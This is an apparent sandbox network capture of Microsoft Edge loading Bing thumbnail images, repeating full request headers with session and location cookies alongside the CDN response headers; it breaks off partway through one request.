cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
range: bytes=0-

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1347
cache-control: public, max-age=2592000
date: Wed, 04 Dec 2024 10:09:16 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306956.4050a67d
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSAAS.41ABDF9130FED43626AC42D0DB458584&w=72&h=72&c=1&rs=1&o=6&pid=TechQna

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSAAS.41ABDF9130FED43626AC42D0DB458584&w=72&h=72&c=1&rs=1&o=6&pid=TechQna HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1868
cache-control: public, max-age=1298979
date: Wed, 04 Dec 2024 10:09:16 GMT
x-cache: TCP_HIT from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306956.4050a773
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.0166d99a-6c0a-4f97-82c0-5b2c4af3f24e&w=32&h=32&o=6&pid=AdsPlus

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.0166d99a-6c0a-4f97-82c0-5b2c4af3f24e&w=32&h=32&o=6&pid=AdsPlus HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1818
cache-control: public, max-age=2478249
date: Wed, 04 Dec 2024 10:09:16 GMT
x-cache: TCP_HIT from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306956.4050a776
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.88390ebb-fd85-4b20-be65-a20d14bad498&w=32&h=32&qlt=90&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.88390ebb-fd85-4b20-be65-a20d14bad498&w=32&h=32&qlt=90&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 616
cache-control: public, max-age=1749373
date: Wed, 04 Dec 2024 10:09:16 GMT
x-cache: TCP_MEM_HIT from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306956.4050a783
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OIP.TlKLzmlUDOQQQyei_8UCfgHaDt&w=80&h=80&c=1&vt=10&bgcl=a4d2e7&r=0&o=6&pid=5.1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OIP.TlKLzmlUDOQQQyei_8UCfgHaDt&w=80&h=80&c=1&vt=10&bgcl=a4d2e7&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 616
cache-control: public, max-age=2155509
date: Wed, 04 Dec 2024 10:09:16 GMT
x-cache: TCP_MEM_HIT from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306956.4050a785
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.02d06900-33f2-4750-a0d3-b071f950d15d&w=32&h=32&qlt=91&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.02d06900-33f2-4750-a0d3-b071f950d15d&w=32&h=32&qlt=91&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2094
x-check-cacheable: YES
cache-control: public, max-age=1059158
date: Wed, 04 Dec 2024 10:09:16 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306956.4050a777
GET

https://th.bing.com/th?id=OIP.l7hD8JdMSQnbprqVzv2IjgHaEK&w=80&h=80&c=7&qlt=80&o=6&pid=13.1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OIP.l7hD8JdMSQnbprqVzv2IjgHaEK&w=80&h=80&c=7&qlt=80&o=6&pid=13.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
